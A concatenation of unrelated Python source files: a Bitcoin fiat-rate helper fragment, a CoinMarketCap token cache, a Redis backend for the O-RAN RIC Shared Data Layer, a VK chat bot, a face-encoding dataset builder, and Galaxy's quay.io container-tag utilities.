if satoshis is None: # Can happen with incomplete history
return _("Unknown")
if rate:
value = Decimal(satoshis) / COIN * Decimal(rate)
return "%s" % (self.ccy_amount_str(value, True))
return _("No data")
def history_rate(self, d_t):
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy)
self.history_used_spot = True
return rate
def historical_value_str(self, satoshis, d_t):
rate = self.history_rate(d_t)
return self.value_str(satoshis, rate)
|
__init__.py
|
import time
import threading
from ..token import Token
from ..worker import WorkerCircularQueue, Worker
class CMCService:
def __init__(self, update_interval: float = 15, apikeys=None, start=True) -> None:
self.__lock = threading.Lock()
self.__cache = {}
self.__q = WorkerCircularQueue()
self.__kill = False
if apikeys:
for k in apikeys:
self.__q.add(Worker(k))
else:
self.__q.add(Worker())
self.__update()
if start:
self.start_service(update_interval)
def __update(self):
worker = self.__q.next()
tokens = worker.fetch_all()
with self.__lock:
for token in tokens:
self.__cache[token.name] = token
def __update_service(self, update_interval: float = 15) -> None:
start = time.time()
while True:
if self.__kill:
return
if time.time() - start > update_interval:
start - time.time()
self.__update()
def fetch_token(self, name: str) -> Token:
with self.__lock:
return self.__cache[name]
def kill_service(self):
self.__kill = True
def start_service(self, update_interval: float = 15):
self.__kill = False
threading.Thread(target=self.__update_service, kwargs={'update_interval': update_interval}).start()
|
redis.py
|
# Copyright (c) 2019 AT&T Intellectual Property.
# Copyright (c) 2018-2019 Nokia.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This source code is part of the near-RT RIC (RAN Intelligent Controller)
# platform project (RICP).
#
"""The module provides implementation of Shared Data Layer (SDL) database backend interface."""
import contextlib
import threading
from typing import (Callable, Dict, Set, List, Optional, Tuple, Union)
import zlib
import redis
from redis import Redis
from redis.sentinel import Sentinel
from redis.lock import Lock
from redis._compat import nativestr
from redis import exceptions as redis_exceptions
from ricsdl.configuration import _Configuration
from ricsdl.exceptions import (
RejectedByBackend,
NotConnected,
BackendError
)
from .dbbackend_abc import DbBackendAbc
from .dbbackend_abc import DbBackendLockAbc
@contextlib.contextmanager
def _map_to_sdl_exception():
"""Translates known redis exceptions into SDL exceptions."""
try:
yield
except(redis_exceptions.ResponseError) as exc:
raise RejectedByBackend("SDL backend rejected the request: {}".
format(str(exc))) from exc
except(redis_exceptions.ConnectionError, redis_exceptions.TimeoutError) as exc:
raise NotConnected("SDL not connected to backend: {}".
format(str(exc))) from exc
except(redis_exceptions.RedisError) as exc:
raise BackendError("SDL backend failed to process the request: {}".
format(str(exc))) from exc
class PubSub(redis.client.PubSub):
def __init__(self, event_separator, connection_pool, ignore_subscribe_messages=False):
super().__init__(connection_pool, shard_hint=None, ignore_subscribe_messages=ignore_subscribe_messages)
self.event_separator = event_separator
def handle_message(self, response, ignore_subscribe_messages=False):
"""
Parses a pub/sub message. If the channel or pattern was subscribed to
with a message handler, the handler is invoked instead of a parsed
message being returned.
Adapted from: https://github.com/andymccurdy/redis-py/blob/master/redis/client.py
"""
message_type = nativestr(response[0])
if message_type == 'pmessage':
message = {
'type': message_type,
'pattern': response[1],
'channel': response[2],
'data': response[3]
}
elif message_type == 'pong':
message = {
'type': message_type,
'pattern': None,
'channel': None,
'data': response[1]
}
else:
message = {
'type': message_type,
'pattern': None,
'channel': response[1],
'data': response[2]
}
# if this is an unsubscribe message, remove it from memory
if message_type in self.UNSUBSCRIBE_MESSAGE_TYPES:
if message_type == 'punsubscribe':
pattern = response[1]
if pattern in self.pending_unsubscribe_patterns:
self.pending_unsubscribe_patterns.remove(pattern)
self.patterns.pop(pattern, None)
else:
channel = response[1]
if channel in self.pending_unsubscribe_channels:
self.pending_unsubscribe_channels.remove(channel)
self.channels.pop(channel, None)
if message_type in self.PUBLISH_MESSAGE_TYPES:
# if there's a message handler, invoke it
if message_type == 'pmessage':
handler = self.patterns.get(message['pattern'], None)
else:
handler = self.channels.get(message['channel'], None)
if handler:
# Need to send only channel and notification instead of raw
# message
message_channel = self._strip_ns_from_bin_key('', message['channel'])
message_data = message['data'].decode('utf-8')
messages = message_data.split(self.event_separator)
handler(message_channel, messages)
return message_channel, messages
elif message_type != 'pong':
# this is a subscribe/unsubscribe message. ignore if we don't
# want them
if ignore_subscribe_messages or self.ignore_subscribe_messages:
return None
return message
@classmethod
def _strip_ns_from_bin_key(cls, ns: str, nskey: bytes) -> str:
try:
redis_key = nskey.decode('utf-8')
except UnicodeDecodeError as exc:
msg = u'Namespace %s key conversion to string failed: %s' % (ns, str(exc))
raise RejectedByBackend(msg)
nskey = redis_key.split(',', 1)
if len(nskey) != 2:
msg = u'Namespace %s key:%s has no namespace prefix' % (ns, redis_key)
raise RejectedByBackend(msg)
return nskey[1]
class RedisBackend(DbBackendAbc):
"""
A class providing an implementation of database backend of Shared Data Layer (SDL), when
backend database solution is Redis.
Args:
configuration (_Configuration): SDL configuration, containing credentials to connect to
Redis database backend.
"""
def __init__(self, configuration: _Configuration) -> None:
super().__init__()
self.next_client_event = 0
self.event_separator = configuration.get_event_separator()
self.clients = list()
with _map_to_sdl_exception():
self.clients = self.__create_redis_clients(configuration)
def __del__(self):
self.close()
def __str__(self):
out = {"DB type": "Redis"}
for i, r in enumerate(self.clients):
out["Redis client[" + str(i) + "]"] = str(r)
return str(out)
def is_connected(self):
is_connected = True
with _map_to_sdl_exception():
for c in self.clients:
if not c.redis_client.ping():
is_connected = False
break
return is_connected
def close(self):
for c in self.clients:
c.redis_client.close()
def set(self, ns: str, data_map: Dict[str, bytes]) -> None:
db_data_map = self.__add_data_map_ns_prefix(ns, data_map)
with _map_to_sdl_exception():
self.__getClient(ns).mset(db_data_map)
def set_if(self, ns: str, key: str, old_data: bytes, new_data: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, key)
with _map_to_sdl_exception():
return self.__getClient(ns).execute_command('SETIE', db_key, new_data, old_data)
def set_if_not_exists(self, ns: str, key: str, data: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, key)
with _map_to_sdl_exception():
return self.__getClient(ns).setnx(db_key, data)
def get(self, ns: str, keys: List[str]) -> Dict[str, bytes]:
ret = dict()
db_keys = self.__add_keys_ns_prefix(ns, keys)
with _map_to_sdl_exception():
values = self.__getClient(ns).mget(db_keys)
for idx, val in enumerate(values):
# return only key values, which has a value
if val is not None:
ret[keys[idx]] = val
return ret
def find_keys(self, ns: str, key_pattern: str) -> List[str]:
db_key_pattern = self.__add_key_ns_prefix(ns, key_pattern)
with _map_to_sdl_exception():
ret = self.__getClient(ns).keys(db_key_pattern)
return self.__strip_ns_from_bin_keys(ns, ret)
def find_and_get(self, ns: str, key_pattern: str) -> Dict[str, bytes]:
# todo: replace below implementation with redis 'NGET' module
ret = dict() # type: Dict[str, bytes]
with _map_to_sdl_exception():
matched_keys = self.find_keys(ns, key_pattern)
if matched_keys:
ret = self.get(ns, matched_keys)
return ret
def remove(self, ns: str, keys: List[str]) -> None:
db_keys = self.__add_keys_ns_prefix(ns, keys)
with _map_to_sdl_exception():
self.__getClient(ns).delete(*db_keys)
def remove_if(self, ns: str, key: str, data: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, key)
with _map_to_sdl_exception():
return self.__getClient(ns).execute_command('DELIE', db_key, data)
def add_member(self, ns: str, group: str, members: Set[bytes]) -> None:
db_key = self.__add_key_ns_prefix(ns, group)
with _map_to_sdl_exception():
self.__getClient(ns).sadd(db_key, *members)
def remove_member(self, ns: str, group: str, members: Set[bytes]) -> None:
db_key = self.__add_key_ns_prefix(ns, group)
with _map_to_sdl_exception():
self.__getClient(ns).srem(db_key, *members)
def remove_group(self, ns: str, group: str) -> None:
db_key = self.__add_key_ns_prefix(ns, group)
with _map_to_sdl_exception():
self.__getClient(ns).delete(db_key)
def get_members(self, ns: str, group: str) -> Set[bytes]:
db_key = self.__add_key_ns_prefix(ns, group)
with _map_to_sdl_exception():
return self.__getClient(ns).smembers(db_key)
def is_member(self, ns: str, group: str, member: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, group)
with _map_to_sdl_exception():
return self.__getClient(ns).sismember(db_key, member)
def group_size(self, ns: str, group: str) -> int:
db_key = self.__add_key_ns_prefix(ns, group)
with _map_to_sdl_exception():
return self.__getClient(ns).scard(db_key)
def set_and_publish(self, ns: str, channels_and_events: Dict[str, List[str]],
data_map: Dict[str, bytes]) -> None:
db_data_map = self.__add_data_map_ns_prefix(ns, data_map)
channels_and_events_prepared = []
total_events = 0
channels_and_events_prepared, total_events = self._prepare_channels(ns, channels_and_events)
with _map_to_sdl_exception():
return self.__getClient(ns).execute_command(
"MSETMPUB",
len(db_data_map),
total_events,
*[val for data in db_data_map.items() for val in data],
*channels_and_events_prepared,
)
def set_if_and_publish(self, ns: str, channels_and_events: Dict[str, List[str]], key: str,
old_data: bytes, new_data: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, key)
channels_and_events_prepared = []
channels_and_events_prepared, _ = self._prepare_channels(ns, channels_and_events)
with _map_to_sdl_exception():
ret = self.__getClient(ns).execute_command("SETIEMPUB", db_key, new_data, old_data,
*channels_and_events_prepared)
return ret == b"OK"
def set_if_not_exists_and_publish(self, ns: str, channels_and_events: Dict[str, List[str]],
key: str, data: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, key)
channels_and_events_prepared, _ = self._prepare_channels(ns, channels_and_events)
with _map_to_sdl_exception():
ret = self.__getClient(ns).execute_command("SETNXMPUB", db_key, data,
*channels_and_events_prepared)
return ret == b"OK"
def remove_and_publish(self, ns: str, channels_and_events: Dict[str, List[str]],
keys: List[str]) -> None:
db_keys = self.__add_keys_ns_prefix(ns, keys)
channels_and_events_prepared, total_events = self._prepare_channels(ns, channels_and_events)
with _map_to_sdl_exception():
return self.__getClient(ns).execute_command(
"DELMPUB",
len(db_keys),
total_events,
*db_keys,
*channels_and_events_prepared,
)
def remove_if_and_publish(self, ns: str, channels_and_events: Dict[str, List[str]], key: str,
data: bytes) -> bool:
db_key = self.__add_key_ns_prefix(ns, key)
channels_and_events_prepared, _ = self._prepare_channels(ns, channels_and_events)
with _map_to_sdl_exception():
ret = self.__getClient(ns).execute_command("DELIEMPUB", db_key, data,
*channels_and_events_prepared)
return bool(ret)
def remove_all_and_publish(self, ns: str, channels_and_events: Dict[str, List[str]]) -> None:
keys = self.__getClient(ns).keys(self.__add_key_ns_prefix(ns, "*"))
channels_and_events_prepared, total_events = self._prepare_channels(ns, channels_and_events)
with _map_to_sdl_exception():
return self.__getClient(ns).execute_command(
"DELMPUB",
len(keys),
total_events,
*keys,
*channels_and_events_prepared,
)
def subscribe_channel(self, ns: str, cb: Callable[[str, List[str]], None],
channels: List[str]) -> None:
channels = self.__add_keys_ns_prefix(ns, channels)
for channel in channels:
with _map_to_sdl_exception():
redis_ctx = self.__getClientConn(ns)
redis_ctx.redis_pubsub.subscribe(**{channel: cb})
if not redis_ctx.pubsub_thread.is_alive() and redis_ctx.run_in_thread:
redis_ctx.pubsub_thread = redis_ctx.redis_pubsub.run_in_thread(sleep_time=0.001,
daemon=True)
def unsubscribe_channel(self, ns: str, channels: List[str]) -> None:
channels = self.__add_keys_ns_prefix(ns, channels)
for channel in channels:
with _map_to_sdl_exception():
self.__getClientConn(ns).redis_pubsub.unsubscribe(channel)
def start_event_listener(self) -> None:
redis_ctxs = self.__getClientConns()
for redis_ctx in redis_ctxs:
if redis_ctx.pubsub_thread.is_alive():
raise RejectedByBackend("Event loop already started")
if redis_ctx.redis_pubsub.subscribed and len(redis_ctx.redis_client.pubsub_channels()) > 0:
redis_ctx.pubsub_thread = redis_ctx.redis_pubsub.run_in_thread(sleep_time=0.001, daemon=True)
redis_ctx.run_in_thread = True
def handle_events(self) -> Optional[Tuple[str, List[str]]]:
if self.next_client_event >= len(self.clients):
self.next_client_event = 0
redis_ctx = self.clients[self.next_client_event]
self.next_client_event += 1
if redis_ctx.pubsub_thread.is_alive() or redis_ctx.run_in_thread:
raise RejectedByBackend("Event loop already started")
try:
return redis_ctx.redis_pubsub.get_message(ignore_subscribe_messages=True)
except RuntimeError:
return None
def __create_redis_clients(self, config):
clients = list()
cfg_params = config.get_params()
if cfg_params.db_cluster_addr_list is None:
clients.append(self.__create_legacy_redis_client(cfg_params))
else:
for addr in cfg_params.db_cluster_addr_list.split(","):
client = self.__create_redis_client(cfg_params, addr)
clients.append(client)
return clients
def __create_legacy_redis_client(self, cfg_params):
return self.__create_redis_client(cfg_params, cfg_params.db_host)
def __create_redis_client(self, cfg_params, addr):
new_sentinel = None
new_redis = None
if cfg_params.db_sentinel_port is None:
new_redis = Redis(host=addr, port=cfg_params.db_port, db=0, max_connections=20)
else:
sentinel_node = (addr, cfg_params.db_sentinel_port)
master_name = cfg_params.db_sentinel_master_name
new_sentinel = Sentinel([sentinel_node])
new_redis = new_sentinel.master_for(master_name)
new_redis.set_response_callback('SETIE', lambda r: r and nativestr(r) == 'OK' or False)
new_redis.set_response_callback('DELIE', lambda r: r and int(r) == 1 or False)
redis_pubsub = PubSub(self.event_separator, new_redis.connection_pool, ignore_subscribe_messages=True)
pubsub_thread = threading.Thread(target=None)
run_in_thread = False
return _RedisConn(new_redis, redis_pubsub, pubsub_thread, run_in_thread)
def __getClientConns(self):
return self.clients
def __getClientConn(self, ns):
clients_cnt = len(self.clients)
client_id = self.__get_hash(ns) % clients_cnt
return self.clients[client_id]
def __getClient(self, ns):
clients_cnt = len(self.clients)
client_id = 0
if clients_cnt > 1:
client_id = self.__get_hash(ns) % clients_cnt
return self.clients[client_id].redis_client
@classmethod
def __get_hash(cls, str):
return zlib.crc32(str.encode())
@classmethod
def __add_key_ns_prefix(cls, ns: str, key: str):
return '{' + ns + '},' + key
@classmethod
def __add_keys_ns_prefix(cls, ns: str, keylist: List[str]) -> List[str]:
ret_nskeys = []
for k in keylist:
ret_nskeys.append('{' + ns + '},' + k)
return ret_nskeys
@classmethod
def __add_data_map_ns_prefix(cls, ns: str, data_dict: Dict[str, bytes]) -> Dict[str, bytes]:
ret_nsdict = {}
for key, val in data_dict.items():
ret_nsdict['{' + ns + '},' + key] = val
return ret_nsdict
@classmethod
def __strip_ns_from_bin_keys(cls, ns: str, nskeylist: List[bytes]) -> List[str]:
ret_keys = []
for k in nskeylist:
try:
redis_key = k.decode("utf-8")
except UnicodeDecodeError as exc:
msg = u'Namespace %s key conversion to string failed: %s' % (ns, str(exc))
raise RejectedByBackend(msg)
nskey = redis_key.split(',', 1)
if len(nskey) != 2:
msg = u'Namespace %s key:%s has no namespace prefix' % (ns, redis_key)
raise RejectedByBackend(msg)
ret_keys.append(nskey[1])
return ret_keys
def _prepare_channels(self, ns: str,
channels_and_events: Dict[str, List[str]]) -> Tuple[List, int]:
channels_and_events_prepared = []
for channel, events in channels_and_events.items():
one_channel_join_events = None
for event in events:
if one_channel_join_events is None:
channels_and_events_prepared.append(self.__add_key_ns_prefix(ns, channel))
one_channel_join_events = event
else:
one_channel_join_events = one_channel_join_events + self.event_separator + event
channels_and_events_prepared.append(one_channel_join_events)
pairs_cnt = int(len(channels_and_events_prepared) / 2)
return channels_and_events_prepared, pairs_cnt
def get_redis_connection(self, ns: str):
"""Return existing Redis database connection valid for the namespace."""
return self.__getClient(ns)
class _RedisConn:
"""
Internal class container to hold redis client connection
"""
def __init__(self, redis_client, pubsub, pubsub_thread, run_in_thread):
self.redis_client = redis_client
self.redis_pubsub = pubsub
self.pubsub_thread = pubsub_thread
self.run_in_thread = run_in_thread
def __str__(self):
return str(
{
"Client": repr(self.redis_client),
"Subscrions": self.redis_pubsub.subscribed,
"PubSub thread": repr(self.pubsub_thread),
"Run in thread": self.run_in_thread,
}
)
class RedisBackendLock(DbBackendLockAbc):
"""
A class providing an implementation of database backend lock of Shared Data Layer (SDL), when
backend database solution is Redis.
Args:
ns (str): Namespace under which this lock is targeted.
name (str): Lock name, identifies the lock key in a Redis database backend.
expiration (int, float): Lock expiration time after which the lock is removed if it hasn't
been released earlier by a 'release' method.
redis_backend (RedisBackend): Database backend object containing connection to Redis
database.
"""
lua_get_validity_time = None
# KEYS[1] - lock name
# ARGS[1] - token
# return < 0 in case of failure, otherwise return lock validity time in milliseconds.
LUA_GET_VALIDITY_TIME_SCRIPT = """
local token = redis.call('get', KEYS[1])
if not token then
return -10
end
if token ~= ARGV[1] then
return -11
end
return redis.call('pttl', KEYS[1])
"""
def __init__(self, ns: str, name: str, expiration: Union[int, float],
redis_backend: RedisBackend) -> None:
super().__init__(ns, name)
self.__redis = redis_backend.get_redis_connection(ns)
with _map_to_sdl_exception():
redis_lockname = '{' + ns + '},' + self._lock_name
self.__redis_lock = Lock(redis=self.__redis, name=redis_lockname, timeout=expiration)
self._register_scripts()
def __str__(self):
return str(
{
"lock DB type": "Redis",
"lock namespace": self._ns,
"lock name": self._lock_name,
"lock status": self._lock_status_to_string()
}
)
def acquire(self, retry_interval: Union[int, float] = 0.1,
retry_timeout: Union[int, float] = 10) -> bool:
succeeded = False
self.__redis_lock.sleep = retry_interval
with _map_to_sdl_exception():
succeeded = self.__redis_lock.acquire(blocking_timeout=retry_timeout)
return succeeded
def release(self) -> None:
with _map_to_sdl_exception():
self.__redis_lock.release()
def refresh(self) -> None:
with _map_to_sdl_exception():
self.__redis_lock.reacquire()
def get_validity_time(self) -> Union[int, float]:
validity = 0
if self.__redis_lock.local.token is None:
msg = u'Cannot get validity time of an unlocked lock %s' % self._lock_name
raise RejectedByBackend(msg)
with _map_to_sdl_exception():
validity = self.lua_get_validity_time(keys=[self.__redis_lock.name],
args=[self.__redis_lock.local.token],
client=self.__redis)
if validity < 0:
msg = (u'Getting validity time of a lock %s failed with error code: %d'
% (self._lock_name, validity))
raise RejectedByBackend(msg)
ftime = validity / 1000.0
if ftime.is_integer():
return int(ftime)
return ftime
def _register_scripts(self):
cls = self.__class__
client = self.__redis
if cls.lua_get_validity_time is None:
cls.lua_get_validity_time = client.register_script(cls.LUA_GET_VALIDITY_TIME_SCRIPT)
def _lock_status_to_string(self) -> str:
try:
if self.__redis_lock.locked():
if self.__redis_lock.owned():
return 'locked'
return 'locked by someone else'
return 'unlocked'
except(redis_exceptions.RedisError) as exc:
return f'Error: {str(exc)}'
|
olya.py
|
import copy
import json
import logging
import queue
import threading
import attr
from api.models.updates import MessageUpdate
from api.vk import VkApi
logging.basicConfig(**{
'format': '%(asctime)s %(levelname)s %(name)-15s %(message)s',
'datefmt': '%Y-%m-%d %H:%M:%S'
})
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
@attr.s
class KeyboardButton(object):
text = attr.ib()
label = attr.ib()
color = attr.ib(default='Default')
payload = attr.ib(default=attr.Factory(dict))
COLOR_PRIMARY = 'Primary'
COLOR_DEFAULT = 'Default'
COLOR_NEGATIVE = 'Negative'
COLOR_POSITIVE = 'Positive'
def to_dict(self):
return {
'action': {
'text': self.text,
'label': self.label,
'payload': json.dumps(self.payload)
},
'color': self.color
}
def prepare_keyboard(buttons, one_time=False):
buttons = copy.deepcopy(buttons)
for i, row in enumerate(buttons):
for j, button in enumerate(row):
buttons[i][j] = button.to_dict()
return {
'one_time': one_time,
'buttons': buttons
}
def update_handler(messages: queue.Queue, vk_api: VkApi, is_chat):
while True:
try:
long_poll_server, error = vk_api.messages.get_long_poll_server()
if error is not None:
return
while True:
ts, updates = vk_api.messages.get_long_poll_update(long_poll_server, 2)
for update in updates:
if isinstance(update, MessageUpdate):
messages.put((is_chat, update))
long_poll_server.ts = ts
except Exception as e:
logger.exception(e)
def message_handler(messages: queue.Queue, chat: VkApi, group: VkApi):
while True:
message: MessageUpdate
is_chat, message = messages.get()
logger.info('Message ({}): {}'.format(is_chat, message))
if not message.is_outbox():
if is_chat:
pass
else:
buttons = [
[KeyboardButton(text='Ура!', label='ura', )]
]
keyboard = {
'one_time': False,
'buttons': [[{
'action': {
'type': 'text',
'payload': json.dumps({'buttons': '1'}),
'label': 'Предыдущая',
},
'color': 'negative'
},
{
'action': {
'type': 'text',
'payload': json.dumps({'buttons': '2'}),
'label': 'Pred',
},
'color': 'primary'
}
]]
}
keyboard = json.dumps(keyboard, ensure_ascii=False).encode('utf-8')
keyboard = str(keyboard.decode('utf-8'))
group.messages.send(peer_id=2000000001,
message=message.text,
keyboard=keyboard)
messages.task_done()
def main():
with open('secrets.json', 'r') as file:
secrets = json.load(file)
chat_bot = VkApi(access_token=secrets['chat'])
group_bot = VkApi(access_token=secrets['group'])
_, res = group_bot.messages.get_conversations()
print(res)
messages_pool = queue.Queue(maxsize=100)
message_handler_thread = threading.Thread(target=message_handler,
args=[messages_pool, chat_bot, group_bot])
# chat_bot_update_thread = threading.Thread(target=update_handler, args=[messages_pool, chat_bot, True])
group_bot_update_thread = threading.Thread(target=update_handler, args=[messages_pool, group_bot, False])
message_handler_thread.start()
# chat_bot_update_thread.start()
group_bot_update_thread.start()
while True:
text = input()
if text == 'quit':
break
if __name__ == '__main__':
main()
|
dataset.py
|
import os
import face_recognition
import progressbar
import pickle
import multiprocessing
import numpy as np
import threading
class Generate:
"""
Used for creating segmented facial data.
A new dataset is created for each person
Attributes
----------
KNOWN_FACES_DIR : str
Path to known faces directory
known_faces : List
Used for storing all the encoded data
known_names : List
Used for storing all the name data
FUNCTIONS
----------
resolve -> Void
Initiates the resolve function
resolve_images -> Void
Resolves all the images in the known faces directory
save -> Void
Saves the data to a pickle file
"""
def __init__(self) -> None:
self.KNOWN_FACES_DIR = "Images/Known"
self.known_faces = []
self.known_names = []
def resolve(self, name, dirname):
count = sum([len(files)
for r, d, files in os.walk(f"{self.KNOWN_FACES_DIR}/{name}")])
bar = progressbar.ProgressBar(maxval=count,
widgets=[progressbar.Bar('⬛', '[', ']', '⬜'), ' ', progressbar.Percentage()]).start()
dir_list = os.listdir(f"{self.KNOWN_FACES_DIR}/{name}")
arr = np.array(dir_list)
newarr = np.array_split(arr, 120)
threads = [threading.Thread(
target=self.resolve_images, args=[arr, name, bar, dirname]) for arr in newarr]
for thread in threads:
thread.start()
thread.join()
self.save(dirname)
bar.finish()
def resolve_images(self, arr, name, bar, dirname):
for filename in arr:
image = face_recognition.load_image_file(
f"{self.KNOWN_FACES_DIR}/{name}/{filename}")
encodings = face_recognition.face_encodings(image)
if len(encodings) > 0:
encoding = encodings[0]
self.known_faces.append(encoding)
self.known_names.append(name)
bar.update(value=bar.currval+1)
self.save(dirname)
def save(self, dirname):
if not os.path.isdir("dataset"):
os.makedirs("dataset")
if not os.path.isdir(f"dataset/{str(dirname)}"):
os.makedirs(f'dataset/{str(dirname)}')
with open(f'dataset/{str(dirname)}/faces.dat', 'wb') as f:
pickle.dump(self.known_faces, f)
open(f"dataset/{str(dirname)}/names.txt",
'w+').write(str(self.known_names))
def main():
print("Initiating all processes...")
dir_list = os.listdir("Images/Known")
arr = np.array(dir_list)
newarr = np.array_split(arr, 35)
for arr in newarr:
gen = Generate()
thread = multiprocessing.Process(
target=res, args=[arr, gen])
thread.start()
# thread.join()
def res(arr, gen):
threads = [multiprocessing.Process(target=gen.resolve, args=[name, name])
for name in arr]
for thread in threads:
thread.start()
thread.join()
if __name__ == "__main__":
main()
|
util.py
|
"""Utilities for working with mulled abstractions outside the mulled package."""
from __future__ import print_function
import collections
import hashlib
import logging
import re
import sys
import tarfile
import threading
from io import BytesIO
import packaging.version
import requests
log = logging.getLogger(__name__)
QUAY_REPOSITORY_API_ENDPOINT = 'https://quay.io/api/v1/repository'
BUILD_NUMBER_REGEX = re.compile(r'\d+$')
PARSED_TAG = collections.namedtuple('ParsedTag', 'tag version build_string build_number')
QUAY_IO_TIMEOUT = 10
def create_repository(namespace, repo_name, oauth_token):
assert oauth_token
headers = {'Authorization': 'Bearer %s' % oauth_token}
data = {
"repository": repo_name,
"namespace": namespace,
"description": "",
"visibility": "public",
}
requests.post("https://quay.io/api/v1/repository", json=data, headers=headers, timeout=QUAY_IO_TIMEOUT)
def quay_versions(namespace, pkg_name):
"""Get all version tags for a Docker image stored on quay.io for supplied package name."""
data = quay_repository(namespace, pkg_name)
if 'error_type' in data and data['error_type'] == "invalid_token":
return []
if 'tags' not in data:
raise Exception("Unexpected response from quay.io - no tags description found [%s]" % data)
return [tag for tag in data['tags'].keys() if tag != 'latest']
def quay_repository(namespace, pkg_name):
assert namespace is not None
assert pkg_name is not None
url = 'https://quay.io/api/v1/repository/%s/%s' % (namespace, pkg_name)
response = requests.get(url, timeout=QUAY_IO_TIMEOUT)
data = response.json()
return data
def _namespace_has_repo_name(namespace, repo_name, resolution_cache):
"""
Get all quay containers in the biocontainers repo
"""
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:namespace_repo_names"
if resolution_cache is not None and cache_key in resolution_cache:
repo_names = resolution_cache.get(cache_key)
else:
repos_parameters = {'public': 'true', 'namespace': namespace}
repos_headers = {'Accept-encoding': 'gzip', 'Accept': 'application/json'}
repos_response = requests.get(
QUAY_REPOSITORY_API_ENDPOINT, headers=repos_headers, params=repos_parameters, timeout=QUAY_IO_TIMEOUT)
repos = repos_response.json()['repositories']
repo_names = [r["name"] for r in repos]
if resolution_cache is not None:
resolution_cache[cache_key] = repo_names
return repo_name in repo_names
def mulled_tags_for(namespace, image, tag_prefix=None, resolution_cache=None):
"""Fetch remote tags available for supplied image name.
The result will be sorted so newest tags are first.
"""
if resolution_cache is not None:
# Following check is pretty expensive against biocontainers... don't even bother doing it
# if can't cache the response.
if not _namespace_has_repo_name(namespace, image, resolution_cache):
log.debug("skipping mulled_tags_for [%s] no repository" % image)
return []
cache_key = "galaxy.tool_util.deps.container_resolvers.mulled.util:tag_cache"
if resolution_cache is not None:
if cache_key not in resolution_cache:
resolution_cache[cache_key] = collections.defaultdict(dict)
tag_cache = resolution_cache.get(cache_key)
else:
tag_cache = collections.defaultdict(dict)
tags_cached = False
if namespace in tag_cache:
if image in tag_cache[namespace]:
tags = tag_cache[namespace][image]
tags_cached = True
if not tags_cached:
tags = quay_versions(namespace, image)
tag_cache[namespace][image] = tags
if tag_prefix is not None:
tags = [t for t in tags if t.startswith(tag_prefix)]
tags = version_sorted(tags)
return tags
def split_tag(tag):
"""Split mulled image tag into conda version and conda build."""
return tag.rsplit('--', 1)
def parse_tag(tag):
"""Decompose tag of mulled images into version, build string and build number."""
version = tag
build_string = "-1"
if '--' in tag:
version, build_string = tag.rsplit('--', 1)
elif '-' in tag:
# Should be mulled multi-container image tag
version, build_string = tag.rsplit('-', 1)
build_number = int(BUILD_NUMBER_REGEX.search(tag).group(0))
return PARSED_TAG(tag=tag,
version=packaging.version.parse(version),
build_string=packaging.version.parse(build_string),
build_number=build_number)
def version_sorted(elements):
"""Sort iterable based on loose description of "version" from newest to oldest."""
elements = (parse_tag(tag) for tag in elements)
elements = sorted(elements, key=lambda tag: tag.build_string, reverse=True)
elements = sorted(elements, key=lambda tag: tag.build_number, reverse=True)
elements = sorted(elements, key=lambda tag: tag.version)
return [e.tag for e in elements]
Target = collections.namedtuple("Target", ["package_name", "version", "build", "package"])
def build_target(package_name, version=None, build=None, tag=None):
"""Use supplied arguments to build a :class:`Target` object."""
if tag is not None:
assert version is None
assert build is None
version, build = split_tag(tag)
return Target(package_name, version, build, package_name)
def conda_build_target_str(target):
rval = target.package_name
if target.version:
rval += "=%s" % target.version
if target.build:
rval += "=%s" % target.build
return rval
def _simple_image_name(targets, image_build=None):
target = targets[0]
suffix = ""
if target.version is not None:
build = target.build
if build is None and image_build is not None and image_build != "0":
# Special case image_build == "0", which has been built without a suffix
print("WARNING: Hard-coding image build instead of using Conda build - this is not recommended.")
build = image_build
suffix += ":%s" % target.version
if build is not None:
suffix += "--%s" % build
return "%s%s" % (target.package_name, suffix)
def v1_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 1 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names and versions together as the repository name. For mulled
version 1 containers the image build is the repository tag (if supplied).
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v1_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v1_image_name(multi_targets)
'mulled-v1-b06ecbd9141f0dbbc0c287375fc0813adfcbdfbd'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v1_image_name(multi_targets_on_versionless)
'mulled-v1-bda945976caa5734347fbf7f35066d9f58519e0c'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v1_image_name(multi_targets_versionless)
'mulled-v1-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
requirements_buffer = "\n".join(map(conda_build_target_str, targets_order))
m = hashlib.sha1()
m.update(requirements_buffer.encode())
suffix = "" if not image_build else ":%s" % image_build
return "mulled-v1-%s%s" % (m.hexdigest(), suffix)
def v2_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 2 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names as the repository name and hash the package versions (if set)
